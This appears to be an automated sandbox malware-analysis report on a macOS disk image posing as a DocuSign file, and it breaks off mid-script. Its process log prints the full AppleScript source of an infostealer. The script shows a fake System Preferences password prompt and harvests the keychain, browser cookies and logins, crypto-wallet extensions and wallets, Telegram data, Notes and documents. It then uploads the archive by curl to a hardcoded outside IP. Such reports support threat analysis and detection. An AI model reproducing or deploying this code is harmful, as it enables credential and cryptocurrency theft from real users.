92d69b264f4f3d4c2f5ba4fd5c4700c2197b20d1ceea75c38a968be91ea6dc13

Analysis

max time kernel
237s
max time network
379s
platform
macos-10.15_amd64
resource
macos-20241106-en
resource tags

arch:amd64arch:i386image:macos-20241106-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
submitted
20-11-2024 18:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DocuSignWITWB.dmg
Size

249KB
MD5

428ffe4753aa646259211668899cd6c3
SHA1

b2cc431816f54d3147f6b64fce2f7fc5f3d845fb
SHA256

92d69b264f4f3d4c2f5ba4fd5c4700c2197b20d1ceea75c38a968be91ea6dc13
SHA512

7a96e17d0d251a886c3eabcbe14ff50eb685b464918066814dedb9148d28cd828938e610710b7d78901229775e6af1ee87769998649fbd3da0f7327a5a019d92
SSDEEP

6144:XYo0JhH5/gTz5LVFEwtLMF/7WZar48ZZx1bFAumMT:XYzZ/QVFEEeWZm4UZxpFpT

Score

8^/10

discovery evasion execution exfiltration

Malware Config

Signatures

Identifies hardware specifics through system_profiler 2 IoCs

Processes:

ioc	process
sh -c "system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType"
system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType

Exfiltration Over Alternative Protocol 1 TTPs 2 IoCs

Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.

exfiltration

Exfiltration Over Unencrypted Non-C2 Protocol

T1048.003

Processes:

ioc	process
sh -c "osascript -e 'set release to true set filegrabbers to true if release then try tell window 1 of application \"Terminal\" to set visible to false end try end if on filesizer(paths) set fsz to 0 try set theItem to quoted form of POSIX path of paths set fsz to (do shell script \"/usr/bin/mdls -name kMDItemFSSize -raw \" & theItem) end try return fsz end filesizer on mkdir(someItem) try set filePosixPath to quoted form of (POSIX path of someItem) do shell script \"mkdir -p \" & filePosixPath end try end mkdir on FileName(filePath) try set reversedPath to (reverse of every character of filePath) as string set trimmedPath to text 1 thru ((offset of \"/\" in reversedPath) - 1) of reversedPath set finalPath to (reverse of every character of trimmedPath) as string return finalPath end try end FileName on BeforeFileName(filePath) try set lastSlash to offset of \"/\" in (reverse of every character of filePath) as string set trimmedPath to text 1 thru -(lastSlash + 1) of filePath return trimmedPath end try end BeforeFileName on writeText(textToWrite, filePath) try set folderPath to BeforeFileName(filePath) mkdir(folderPath) set fileRef to (open for access filePath with write permission) write textToWrite to fileRef starting at eof close access fileRef end try end writeText on readwrite(path_to_file, path_as_save) try set fileContent to read path_to_file set folderPath to BeforeFileName(path_as_save) mkdir(folderPath) do shell script \"cat \" & quoted form of path_to_file & \" > \" & quoted form of path_as_save end try end readwrite on readwrite2(path_to_file, path_as_save) try set folderPath to do shell script \"dirname \" & quoted form of path_as_save mkdir(folderPath) tell application \"Finder\" set sourceFile to POSIX file path_to_file as alias set destinationFolder to POSIX file folderPath as alias duplicate sourceFile to destinationFolder with replacing end tell end try end readwrite2 on isDirectory(someItem) try set filePosixPath to quoted form of (POSIX path of someItem) set fileType to (do shell script \"file -b \" & filePosixPath) if fileType ends with \"directory\" then return true end if return false end try end isDirectory on GrabFolderLimit(sourceFolder, destinationFolder) try set bankSize to 0 set exceptionsList to {\".DS_Store\", \"Partitions\", \"Code Cache\", \"Cache\", \"market-history-cache.json\", \"journals\", \"Previews\"} set fileList to list folder sourceFolder without invisibles mkdir(destinationFolder) repeat with currentItem in fileList if currentItem is not in exceptionsList then set itemPath to sourceFolder & \"/\" & currentItem set savePath to destinationFolder & \"/\" & currentItem if isDirectory(itemPath) then GrabFolderLimit(itemPath, savePath) else set fsz to filesizer(itemPath) set bankSize to bankSize + fsz if bankSize < 10 * 1024 * 1024 then readwrite(itemPath, savePath) end if end if end if end repeat end try end GrabFolderLimit on GrabFolder(sourceFolder, destinationFolder) try set exceptionsList to {\".DS_Store\", \"Partitions\", \"Code Cache\", \"Cache\", \"market-history-cache.json\", \"journals\", \"Previews\", \"dumps\", \"emoji\", \"user_data\", \"__update__\", \"user_data#2\", \"user_data#3\"} set fileList to list folder sourceFolder without invisibles mkdir(destinationFolder) repeat with currentItem in fileList if currentItem is not in exceptionsList then set itemPath to sourceFolder & \"/\" & currentItem set savePath to destinationFolder & \"/\" & currentItem if isDirectory(itemPath) then GrabFolder(itemPath, savePath) else readwrite(itemPath, savePath) end if end if end repeat end try end GrabFolder on parseFF(firefox, writemind) try set myFiles to {\"/cookies.sqlite\", \"/formhistory.sqlite\", \"/key4.db\", \"/logins.json\"} set fileList to list folder firefox without invisibles repeat with currentItem in fileList set fpath to writemind & \"ff/\" & currentItem set readpath to firefox & currentItem repeat with FFile in myFiles readwrite(readpath & FFile, fpath & FFile) end repeat end repeat end try end parseFF on checkvalid(username, password_entered) try set result to do shell script \"dscl . authonly \" & quoted form of username & space & quoted form of password_entered if result is not equal to \"\" then return false else return true end if on error return false end try end checkvalid on getpwd(username, writemind) try if checkvalid(username, \"\") then set result to do shell script \"security 2>&1 > /dev/null find-generic-password -ga \\\"Chrome\\\" \| awk \\\"{print \$2}\\\"\" writeText(result as string, writemind & \"masterpass-chrome\") else repeat set result to display dialog \"Required Application Helper.\\nPlease enter password for continue.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"System Preferences\" with hidden answer set password_entered to text returned of result if checkvalid(username, password_entered) then writeText(password_entered, writemind & \"pwd\") return password_entered end if end repeat end if end try return \"\" end getpwd on grabPlugins(paths, savePath, pluginList, index) try set fileList to list folder paths without invisibles repeat with PFile in fileList repeat with Plugin in pluginList if (PFile contains Plugin) then set newpath to paths & PFile set newsavepath to savePath & \"/\" & Plugin if index then set newsavepath to newsavepath & \"/IndexedDB/\" end if GrabFolder(newpath, newsavepath) end if end repeat end repeat end try end grabPlugins on chromium(writemind, chromium_map) set pluginList to {\"keenhcnmdmjjhincpilijphpiohdppno\", \"hbbgbephgojikajhfbomhlmmollphcad\", \"cjmkndjhnagcfbpiemnkdpomccnjblmj\", \"dhgnlgphgchebgoemcjekedjjbifijid\", \"hifafgmccdpekplomjjkcfgodnhcellj\", \"kamfleanhcmjelnhaeljonilnmjpkcjc\", \"jnldfbidonfeldmalbflbmlebbipcnle\", \"fdcnegogpncmfejlfnffnofpngdiejii\", \"klnaejjgbibmhlephnhpmaofohgkpgkd\", \"pdadjkfkgcafgbceimcpbkalnfnepbnk\", \"kjjebdkfeagdoogagbhepmbimaphnfln\", \"ldinpeekobnhjjdofggfgjlcehhmanlj\", \"dkdedlpgdmmkkfjabffeganieamfklkm\", \"bcopgchhojmggmffilplmbdicgaihlkp\", \"kpfchfdkjhcoekhdldggegebfakaaiog\", \"idnnbdplmphpflfnlkomgpfbpcgelopg\", \"mlhakagmgkmonhdonhkpjeebfphligng\", \"bipdhagncpgaccgdbddmbpcabgjikfkn\", \"gcbjmdjijjpffkpbgdkaojpmaninaion\", \"nhnkbkgjikgcigadomkphalanndcapjk\", \"bhhhlbepdkbapadjdnnojkbgioiodbic\", \"hoighigmnhgkkdaenafgnefkcmipfjon\", \"klghhnkeealcohjjanjjdaeeggmfmlpl\", \"nkbihfbeogaeaoehlefnkodbefgpgknn\", \"fhbohimaelbohpjbbldcngcnapndodjp\", \"ebfidpplhabeedpnhjnobghokpiioolj\", \"emeeapjkbcbpbpgaagfchmcgglmebnen\", \"fldfpgipfncgndfolcbkdeeknbbbnhcc\", \"penjlddjkjgpnkllboccdgccekpkcbin\", \"fhilaheimglignddkjgofkcbgekhenbh\", \"hmeobnfnfcmdkdcmlblgagmfpfboieaf\", \"cihmoadaighcejopammfbmddcmdekcje\", \"lodccjjbdhfakaekdiahmedfbieldgik\", \"omaabbefbmiijedngplfjmnooppbclkk\", \"cjelfplplebdjjenllpjcblmjkfcffne\", \"jnlgamecbpmbajjfhmmmlhejkemejdma\", \"fpkhgmpbidmiogeglndfbkegfdlnajnf\", \"bifidjkcdpgfnlbcjpdkdcnbiooooblg\", \"amkmjjmmflddogmhpjloimipbofnfjih\", \"flpiciilemghbmfalicajoolhkkenfel\", \"hcflpincpppdclinealmandijcmnkbgn\", \"aeachknmefphepccionboohckonoeemg\", \"nlobpakggmbcgdbpjpnagmdbdhdhgphk\", \"momakdpclmaphlamgjcndbgfckjfpemp\", \"mnfifefkajgofkcjkemidiaecocnkjeh\", \"fnnegphlobjdpkhecapkijjdkgcjhkib\", \"ehjiblpccbknkgimiflboggcffmpphhp\", \"ilhaljfiglknggcoegeknjghdgampffk\", \"pgiaagfkgcbnmiiolekcfmljdagdhlcm\", \"fnjhmkhhmkbjkkabndcnnogagogbneec\", \"bfnaelmomeimhlpmgjnjophhpkkoljpa\", \"imlcamfeniaidioeflifonfjeeppblda\", \"mdjmfdffdcmnoblignmgpommbefadffd\", \"ooiepdgjjnhcmlaobfinbomgebfgablh\", \"pcndjhkinnkaohffealmlmhaepkpmgkb\", \"ppdadbejkmjnefldpcdjhnkpbjkikoip\", \"cgeeodpfagjceefieflmdfphplkenlfk\", \"dlcobpjiigpikoobohmabehhmhfoodbb\", \"jiidiaalihmmhddjgbnbgdfflelocpak\", \"bocpokimicclpaiekenaeelehdjllofo\", \"pocmplpaccanhmnllbbkpgfliimjljgo\", \"cphhlgmgameodnhkjdmkpanlelnlohao\", \"mcohilncbfahbmgdjkbpemcciiolgcge\", \"bopcbmipnjdcdfflfgjdgdjejmgpoaab\", \"khpkpbbcccdmmclmpigdgddabeilkdpd\", \"ejjladinnckdgjemekebdpeokbikhfci\", \"phkbamefinggmakgklpkljjmgibohnba\", \"epapihdplajcdnnkdeiahlgigofloibg\", \"hpclkefagolihohboafpheddmmgdffjm\", \"cjookpbkjnpkmknedggeecikaponcalb\", \"cpmkedoipcpimgecpmgpldfpohjplkpp\", \"modjfdjcodmehnpccdjngmdfajggaoeh\", \"ibnejdfjmmkpcnlpebklmnkoeoihofec\", \"afbcbjpbpfadlkmhmclhkeeodmamcflc\", \"kncchdigobghenbbaddojjnnaogfppfj\", \"efbglgofoippbgcjepnhiblaibcnclgk\", \"mcbigmjiafegjnnogedioegffbooigli\", \"fccgmnglbhajioalokbcidhcaikhlcpm\", \"hnhobjmcibchnmglfbldbfabcgaknlkj\", \"apnehcjmnengpnmccpaibjmhhoadaico\", \"enabgbdfcbaehmbigakijjabdpdnimlg\", \"mgffkfbidihjpoaomajlbgchddlicgpn\", \"fopmedgnkfpebgllppeddmmochcookhc\", \"jojhfeoedkpkglbfimdfabpdfjaoolaf\", \"ammjlinfekkoockogfhdkgcohjlbhmff\", \"abkahkcbhngaebpcgfmhkoioedceoigp\", \"dcbjpgbkjoomeenajdabiicabjljlnfp\", \"gkeelndblnomfmjnophbhfhcjbcnemka\", \"pnndplcbkakcplkjnolgbkdgjikjednm\", \"copjnifcecdedocejpaapepagaodgpbh\", \"hgbeiipamcgbdjhfflifkgehomnmglgk\", \"mkchoaaiifodcflmbaphdgeidocajadp\", \"ellkdbaphhldpeajbepobaecooaoafpg\", \"mdnaglckomeedfbogeajfajofmfgpoae\", \"nknhiehlklippafakaeklbeglecifhad\", \"ckklhkaabbmdjkahiaaplikpdddkenic\", \"fmblappgoiilbgafhjklehhfifbdocee\", \"nphplpgoakhhjchkkhmiggakijnkhfnd\", \"cnmamaachppnkjgnildpdmkaakejnhae\", \"fijngjgcjhjmmpcmkeiomlglpeiijkld\", \"niiaamnmgebpeejeemoifgdndgeaekhe\", \"odpnjmimokcmjgojhnhfcnalnegdjmdn\", \"lbjapbcmmceacocpimbpbidpgmlmoaao\", \"hnfanknocfeofbddgcijnmhnfnkdnaad\", \"hpglfhgfnhbgpjdenjgmdgoeiappafln\", \"egjidjbpglichdcondbcbdnbeeppgdph\", \"ibljocddagjghmlpgihahamcghfggcjc\", \"gkodhkbmiflnmkipcmlhhgadebbeijhh\", \"dbgnhckhnppddckangcjbkjnlddbjkna\", \"mfhbebgoclkghebffdldpobeajmbecfk\", \"nlbmnnijcnlegkjjpcfjclmcfggfefdm\", \"nlgbhdfgdhgbiamfdfmbikcdghidoadd\", \"acmacodkjbdgmoleebolmdjonilkdbch\", \"agoakfejjabomempkjlepdflaleeobhb\", \"dgiehkgfknklegdhekgeabnhgfjhbajd\", \"onhogfjeacnfoofkfgppdlbmlmnplgbn\", \"kkpehldckknjffeakihjajcjccmcjflh\", \"jaooiolkmfcmloonphpiiogkfckgciom\", \"ojggmchlghnjlapmfbnjholfjkiidbch\", \"pmmnimefaichbcnbndcfpaagbepnjaig\", \"oiohdnannmknmdlddkdejbmplhbdcbee\", \"aiifbnbfobpmeekipheeijimdpnlpgpp\", \"aholpfdialjgjfhomihkjbmgjidlcdno\", \"anokgmphncpekkhclmingpimjmcooifb\", \"kkpllkodjeloidieedojogacfhpaihoh\", \"iokeahhehimjnekafflcihljlcjccdbe\", \"ifckdpamphokdglkkdomedpdegcjhjdp\", \"loinekcabhlmhjjbocijdoimmejangoa\", \"fcfcfllfndlomdhbehjjcoimbgofdncg\", \"ifclboecfhkjbpmhgehodcjpciihhmif\", \"dmkamcknogkgcdfhhbddcghachkejeap\", \"ookjlbkiijinhpmnjffcofjonbfbgaoc\", \"oafedfoadhdjjcipmcbecikgokpaphjk\", \"mapbhaebnddapnmifbbkgeedkeplgjmf\", \"cmndjbecilbocjfkibfbifhngkdmjgog\", \"kpfopkelmapcoipemfendmdcghnegimn\", \"lgmpcpglpngdoalbgeoldeajfclnhafa\", \"ppbibelpcjmhbdihakflkdcoccbgbkpo\", \"ffnbelfdoeiohenkjibnmadjiehjhajb\", \"opcgpfmipidbgpenhmajoajpbobppdil\", \"lakggbcodlaclcbbbepmkpdhbcomcgkd\", \"kgdijkcfiglijhaglibaidbipiejjfdp\", \"hdkobeeifhdplocklknbnejdelgagbao\", \"lnnnmfcpbkafcpgdilckhmhbkkbpkmid\", \"nbdhibgjnjpnkajaghbffjbkcgljfgdi\", \"kmhcihpebfmpgmihbkipmjlmmioameka\", \"kmphdnilpmdejikjdnlbcnmnabepfgkh\", \"nngceckbapebfimnlniiiahkandclblb\"} set chromiumFiles to {\"/Network/Cookies\", \"/Cookies\", \"/Web Data\", \"/Login Data\", \"/Local Extension Settings/\", \"/IndexedDB/\"} repeat with chromium in chromium_map set savePath to writemind & \"Chromium/\" & item 1 of chromium & \"_\" try set fileList to list folder item 2 of chromium without invisibles repeat with currentItem in fileList if ((currentItem as string) is equal to \"Default\") or ((currentItem as string) contains \"Profile\") then repeat with CFile in chromiumFiles set readpath to (item 2 of chromium & currentItem & CFile) if ((CFile as string) is equal to \"/Network/Cookies\") then set CFile to \"/Cookies\" end if if ((CFile as string) is equal to \"/Local Extension Settings/\") then grabPlugins(readpath, savePath & currentItem, pluginList, false) else if (CFile as string) is equal to \"/IndexedDB/\" then grabPlugins(readpath, savePath & currentItem, pluginList, true) else set writepath to savePath & currentItem & CFile readwrite(readpath, writepath) end if end repeat end if end repeat end try end repeat end chromium on telegram(writemind, library) try GrabFolder(library & \"Telegram Desktop/tdata/\", writemind & \"Telegram Data/\") end try end telegram on deskwallets(writemind, deskwals) repeat with deskwal in deskwals try GrabFolder(item 2 of deskwal, writemind & item 1 of deskwal) end try end repeat end deskwallets on filegrabber(writemind) try set destinationFolderPath to POSIX file (writemind & \"FileGrabber/\") mkdir(destinationFolderPath) set photosPath to POSIX file (writemind & \"FileGrabber/NotesFiles/\") mkdir(photosPath) set extensionsList to {\"txt\", \"pdf\", \"docx\", \"wallet\", \"key\", \"keys\", \"doc\"} set bankSize to 0 tell application \"Finder\" try set safariFolderPath to (path to home folder as text) & \"Library:Cookies:\" duplicate file (safariFolderPath & \"Cookies.binarycookies\") to folder destinationFolderPath with replacing set name of result to \"saf1\" end try try set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\") try duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder destinationFolderPath with replacing end try set notesFolderPath to (path to home folder as text) & \"Library:Group Containers:group.com.apple.notes:\" set notesAccounts to folder (notesFolderPath & \"Accounts:LocalAccount:Media\") duplicate notesAccounts to photosPath with replacing duplicate notesAccounts to POSIX file photosPath as alias with replacing set notesFolder to folder notesFolderPath set notesFiles to {\"NoteStore.sqlite\", \"NoteStore.sqlite-shm\", \"NoteStore.sqlite-wal\"} repeat with fileName in notesFiles set sourceFile to file fileName of notesFolder duplicate sourceFile to POSIX file destinationFolderPath as alias with replacing end repeat end try try set desktopFiles to every file of desktop set documentsFiles to every file of folder \"Documents\" of (path to home folder) set downloadsFiles to every file of folder \"Downloads\" of (path to home folder) repeat with aFile in (desktopFiles & documentsFiles & downloadsFiles) set fileExtension to name extension of aFile if fileExtension is in extensionsList then set filesize to size of aFile if filesize < 3 * 1024 * 1024 then if (bankSize + filesize) < 30 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + filesize end try else exit repeat end if end if end if end repeat end try end tell end try end filegrabber on send_data(attempt) try set result_send to (do shell script \"curl -X POST -H \\\"user: U86a4irDPnx0tAJz7TLOjLJYmAQVbgSjU5qs/B5Ew50=\\\" -H \\\"BuildID: xfSjtQhSzYb0Vrl3d-Yt-dadILWIh9rw4YAjC3vFKmI=\\\" -H \\\"cl: 0\\\" -H \\\"cn: 0\\\" --max-time 300 -retry 5 -retry-delay 10 -F \\\"file=@/tmp/out.zip\\\" http://141.98.9.20/joinsystem\") on error if attempt < 40 then delay 3 send_data(attempt + 1) end if end try end send_data set username to (system attribute \"USER\") set profile to \"/Users/\" & username set randomNumber to do shell script \"echo \$((RANDOM % 9000 + 1000))\" set writemind to \"/tmp/\" & randomNumber & \"/\" try set result to (do shell script \"system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType\") writeText(result, writemind & \"info\") end try set library to profile & \"/Library/Application Support/\" set password_entered to getpwd(username, writemind) delay 0.01 set chromiumMap to {{\"Chrome\", library & \"Google/Chrome/\"}, {\"Brave\", library & \"BraveSoftware/Brave-Browser/\"}, {\"Edge\", library & \"Microsoft Edge/\"}, {\"Vivaldi\", library & \"Vivaldi/\"}, {\"Opera\", library & \"com.operasoftware.Opera/\"}, {\"OperaGX\", library & \"com.operasoftware.OperaGX/\"}, {\"Chrome Beta\", library & \"Google/Chrome Beta/\"}, {\"Chrome Canary\", library & \"Google/Chrome Canary\"}, {\"Chromium\", library & \"Chromium/\"}, {\"Chrome Dev\", library & \"Google/Chrome Dev/\"}, {\"Arc\", library & \"Arc/\"}, {\"Coccoc\", library & \"Coccoc/\"}} set walletMap to {{\"deskwallets/Electrum\", profile & \"/.electrum/wallets/\"}, {\"deskwallets/Coinomi\", library & \"Coinomi/wallets/\"}, {\"deskwallets/Exodus\", library & \"Exodus/\"}, {\"deskwallets/Atomic\", library & \"atomic/Local Storage/leveldb/\"}, {\"deskwallets/Wasabi\", profile & \"/.walletwasabi/client/Wallets/\"}, {\"deskwallets/Ledger_Live\", library & \"Ledger Live/\"}, {\"deskwallets/Monero\", profile & \"/Monero/wallets/\"}, {\"deskwallets/Bitcoin_Core\", library & \"Bitcoin/wallets/\"}, {\"deskwallets/Litecoin_Core\", library & \"Litecoin/wallets/\"}, {\"deskwallets/Dash_Core\", library & \"DashCore/wallets/\"}, {\"deskwallets/Electrum_LTC\", profile & \"/.electrum-ltc/wallets/\"}, {\"deskwallets/Electron_Cash\", profile & \"/.electron-cash/wallets/\"}, {\"deskwallets/Guarda\", library & \"Guarda/\"}, {\"deskwallets/Dogecoin_Core\", library & \"Dogecoin/wallets/\"}, {\"deskwallets/Trezor_Suite\", library & \"@trezor/suite-desktop/\"}} readwrite(library & \"Binance/app-store.json\", writemind & \"deskwallets/Binance/app-store.json\") readwrite(library & \"@tonkeeper/desktop/config.json\", \"deskwallets/TonKeeper/config.json\") readwrite(profile & \"/Library/Keychains/login.keychain-db\", writemind & \"keychain\") if release then readwrite2(profile & \"/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite\", writemind & \"FileGrabber/NoteStore.sqlite\") readwrite2(profile & \"/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-wal\", writemind & \"FileGrabber/NoteStore.sqlite-wal\") readwrite2(profile & \"/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-shm\", writemind & \"FileGrabber/NoteStore.sqlite-shm\") readwrite2(profile & \"/Library/Containers/com.apple.Safari/Data/Library/Cookies/Cookies.binarycookies\", writemind & \"FileGrabber/Cookies.binarycookies\") readwrite(profile & \"/Library/Cookies/Cookies.binarycookies\", writemind & \"FileGrabber/saf1\") end if if filegrabbers then filegrabber(writemind) end if writeText(username, writemind & \"username\") set ff_paths to {library & \"Firefox/Profiles/\", library & \"Waterfox/Profiles/\", library & \"Pale Moon/Profiles/\"} repeat with firefox in ff_paths try parseFF(firefox, writemind) end try end repeat chromium(writemind, chromiumMap) deskwallets(writemind, walletMap) telegram(writemind, library) do shell script \"ditto -c -k --sequesterRsrc \" & writemind & \" /tmp/out.zip\" send_data(0) do shell script \"rm -r \" & writemind do shell script \"rm /tmp/out.zip\" '&"
osascript -e "set release to true set filegrabbers to true if release then try tell window 1 of application \"Terminal\" to set visible to false end try end if on filesizer(paths) set fsz to 0 try set theItem to quoted form of POSIX path of paths set fsz to (do shell script \"/usr/bin/mdls -name kMDItemFSSize -raw \" & theItem) end try return fsz end filesizer on mkdir(someItem) try set filePosixPath to quoted form of (POSIX path of someItem) do shell script \"mkdir -p \" & filePosixPath end try end mkdir on FileName(filePath) try set reversedPath to (reverse of every character of filePath) as string set trimmedPath to text 1 thru ((offset of \"/\" in reversedPath) - 1) of reversedPath set finalPath to (reverse of every character of trimmedPath) as string return finalPath end try end FileName on BeforeFileName(filePath) try set lastSlash to offset of \"/\" in (reverse of every character of filePath) as string set trimmedPath to text 1 thru -(lastSlash + 1) of filePath return trimmedPath end try end BeforeFileName on writeText(textToWrite, filePath) try set folderPath to BeforeFileName(filePath) mkdir(folderPath) set fileRef to (open for access filePath with write permission) write textToWrite to fileRef starting at eof close access fileRef end try end writeText on readwrite(path_to_file, path_as_save) try set fileContent to read path_to_file set folderPath to BeforeFileName(path_as_save) mkdir(folderPath) do shell script \"cat \" & quoted form of path_to_file & \" > \" & quoted form of path_as_save end try end readwrite on readwrite2(path_to_file, path_as_save) try set folderPath to do shell script \"dirname \" & quoted form of path_as_save mkdir(folderPath) tell application \"Finder\" set sourceFile to POSIX file path_to_file as alias set destinationFolder to POSIX file folderPath as alias duplicate sourceFile to destinationFolder with replacing end tell end try end readwrite2 on isDirectory(someItem) try set filePosixPath to quoted form of (POSIX path of someItem) set fileType to (do shell script \"file -b \" & filePosixPath) if fileType ends with \"directory\" then return true end if return false end try end isDirectory on GrabFolderLimit(sourceFolder, destinationFolder) try set bankSize to 0 set exceptionsList to {\".DS_Store\", \"Partitions\", \"Code Cache\", \"Cache\", \"market-history-cache.json\", \"journals\", \"Previews\"} set fileList to list folder sourceFolder without invisibles mkdir(destinationFolder) repeat with currentItem in fileList if currentItem is not in exceptionsList then set itemPath to sourceFolder & \"/\" & currentItem set savePath to destinationFolder & \"/\" & currentItem if isDirectory(itemPath) then GrabFolderLimit(itemPath, savePath) else set fsz to filesizer(itemPath) set bankSize to bankSize + fsz if bankSize < 10 * 1024 * 1024 then readwrite(itemPath, savePath) end if end if end if end repeat end try end GrabFolderLimit on GrabFolder(sourceFolder, destinationFolder) try set exceptionsList to {\".DS_Store\", \"Partitions\", \"Code Cache\", \"Cache\", \"market-history-cache.json\", \"journals\", \"Previews\", \"dumps\", \"emoji\", \"user_data\", \"__update__\", \"user_data#2\", \"user_data#3\"} set fileList to list folder sourceFolder without invisibles mkdir(destinationFolder) repeat with currentItem in fileList if currentItem is not in exceptionsList then set itemPath to sourceFolder & \"/\" & currentItem set savePath to destinationFolder & \"/\" & currentItem if isDirectory(itemPath) then GrabFolder(itemPath, savePath) else readwrite(itemPath, savePath) end if end if end repeat end try end GrabFolder on parseFF(firefox, writemind) try set myFiles to {\"/cookies.sqlite\", \"/formhistory.sqlite\", \"/key4.db\", \"/logins.json\"} set fileList to list folder firefox without invisibles repeat with currentItem in fileList set fpath to writemind & \"ff/\" & currentItem set readpath to firefox & currentItem repeat with FFile in myFiles readwrite(readpath & FFile, fpath & FFile) end repeat end repeat end try end parseFF on checkvalid(username, password_entered) try set result to do shell script \"dscl . authonly \" & quoted form of username & space & quoted form of password_entered if result is not equal to \"\" then return false else return true end if on error return false end try end checkvalid on getpwd(username, writemind) try if checkvalid(username, \"\") then set result to do shell script \"security 2>&1 > /dev/null find-generic-password -ga \\\"Chrome\\\" \| awk \\\"{print \$2}\\\"\" writeText(result as string, writemind & \"masterpass-chrome\") else repeat set result to display dialog \"Required Application Helper.\\nPlease enter password for continue.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"System Preferences\" with hidden answer set password_entered to text returned of result if checkvalid(username, password_entered) then writeText(password_entered, writemind & \"pwd\") return password_entered end if end repeat end if end try return \"\" end getpwd on grabPlugins(paths, savePath, pluginList, index) try set fileList to list folder paths without invisibles repeat with PFile in fileList repeat with Plugin in pluginList if (PFile contains Plugin) then set newpath to paths & PFile set newsavepath to savePath & \"/\" & Plugin if index then set newsavepath to newsavepath & \"/IndexedDB/\" end if GrabFolder(newpath, newsavepath) end if end repeat end repeat end try end grabPlugins on chromium(writemind, chromium_map) set pluginList to {\"keenhcnmdmjjhincpilijphpiohdppno\", \"hbbgbephgojikajhfbomhlmmollphcad\", \"cjmkndjhnagcfbpiemnkdpomccnjblmj\", \"dhgnlgphgchebgoemcjekedjjbifijid\", \"hifafgmccdpekplomjjkcfgodnhcellj\", \"kamfleanhcmjelnhaeljonilnmjpkcjc\", \"jnldfbidonfeldmalbflbmlebbipcnle\", \"fdcnegogpncmfejlfnffnofpngdiejii\", \"klnaejjgbibmhlephnhpmaofohgkpgkd\", \"pdadjkfkgcafgbceimcpbkalnfnepbnk\", \"kjjebdkfeagdoogagbhepmbimaphnfln\", \"ldinpeekobnhjjdofggfgjlcehhmanlj\", \"dkdedlpgdmmkkfjabffeganieamfklkm\", \"bcopgchhojmggmffilplmbdicgaihlkp\", \"kpfchfdkjhcoekhdldggegebfakaaiog\", \"idnnbdplmphpflfnlkomgpfbpcgelopg\", \"mlhakagmgkmonhdonhkpjeebfphligng\", \"bipdhagncpgaccgdbddmbpcabgjikfkn\", \"gcbjmdjijjpffkpbgdkaojpmaninaion\", \"nhnkbkgjikgcigadomkphalanndcapjk\", \"bhhhlbepdkbapadjdnnojkbgioiodbic\", \"hoighigmnhgkkdaenafgnefkcmipfjon\", \"klghhnkeealcohjjanjjdaeeggmfmlpl\", \"nkbihfbeogaeaoehlefnkodbefgpgknn\", \"fhbohimaelbohpjbbldcngcnapndodjp\", \"ebfidpplhabeedpnhjnobghokpiioolj\", \"emeeapjkbcbpbpgaagfchmcgglmebnen\", \"fldfpgipfncgndfolcbkdeeknbbbnhcc\", \"penjlddjkjgpnkllboccdgccekpkcbin\", \"fhilaheimglignddkjgofkcbgekhenbh\", \"hmeobnfnfcmdkdcmlblgagmfpfboieaf\", \"cihmoadaighcejopammfbmddcmdekcje\", \"lodccjjbdhfakaekdiahmedfbieldgik\", \"omaabbefbmiijedngplfjmnooppbclkk\", \"cjelfplplebdjjenllpjcblmjkfcffne\", \"jnlgamecbpmbajjfhmmmlhejkemejdma\", \"fpkhgmpbidmiogeglndfbkegfdlnajnf\", \"bifidjkcdpgfnlbcjpdkdcnbiooooblg\", \"amkmjjmmflddogmhpjloimipbofnfjih\", \"flpiciilemghbmfalicajoolhkkenfel\", \"hcflpincpppdclinealmandijcmnkbgn\", \"aeachknmefphepccionboohckonoeemg\", \"nlobpakggmbcgdbpjpnagmdbdhdhgphk\", \"momakdpclmaphlamgjcndbgfckjfpemp\", \"mnfifefkajgofkcjkemidiaecocnkjeh\", \"fnnegphlobjdpkhecapkijjdkgcjhkib\", \"ehjiblpccbknkgimiflboggcffmpphhp\", \"ilhaljfiglknggcoegeknjghdgampffk\", \"pgiaagfkgcbnmiiolekcfmljdagdhlcm\", \"fnjhmkhhmkbjkkabndcnnogagogbneec\", \"bfnaelmomeimhlpmgjnjophhpkkoljpa\", \"imlcamfeniaidioeflifonfjeeppblda\", \"mdjmfdffdcmnoblignmgpommbefadffd\", \"ooiepdgjjnhcmlaobfinbomgebfgablh\", \"pcndjhkinnkaohffealmlmhaepkpmgkb\", \"ppdadbejkmjnefldpcdjhnkpbjkikoip\", \"cgeeodpfagjceefieflmdfphplkenlfk\", \"dlcobpjiigpikoobohmabehhmhfoodbb\", \"jiidiaalihmmhddjgbnbgdfflelocpak\", \"bocpokimicclpaiekenaeelehdjllofo\", \"pocmplpaccanhmnllbbkpgfliimjljgo\", \"cphhlgmgameodnhkjdmkpanlelnlohao\", \"mcohilncbfahbmgdjkbpemcciiolgcge\", \"bopcbmipnjdcdfflfgjdgdjejmgpoaab\", \"khpkpbbcccdmmclmpigdgddabeilkdpd\", \"ejjladinnckdgjemekebdpeokbikhfci\", \"phkbamefinggmakgklpkljjmgibohnba\", \"epapihdplajcdnnkdeiahlgigofloibg\", \"hpclkefagolihohboafpheddmmgdffjm\", \"cjookpbkjnpkmknedggeecikaponcalb\", \"cpmkedoipcpimgecpmgpldfpohjplkpp\", \"modjfdjcodmehnpccdjngmdfajggaoeh\", \"ibnejdfjmmkpcnlpebklmnkoeoihofec\", \"afbcbjpbpfadlkmhmclhkeeodmamcflc\", \"kncchdigobghenbbaddojjnnaogfppfj\", \"efbglgofoippbgcjepnhiblaibcnclgk\", \"mcbigmjiafegjnnogedioegffbooigli\", \"fccgmnglbhajioalokbcidhcaikhlcpm\", \"hnhobjmcibchnmglfbldbfabcgaknlkj\", \"apnehcjmnengpnmccpaibjmhhoadaico\", 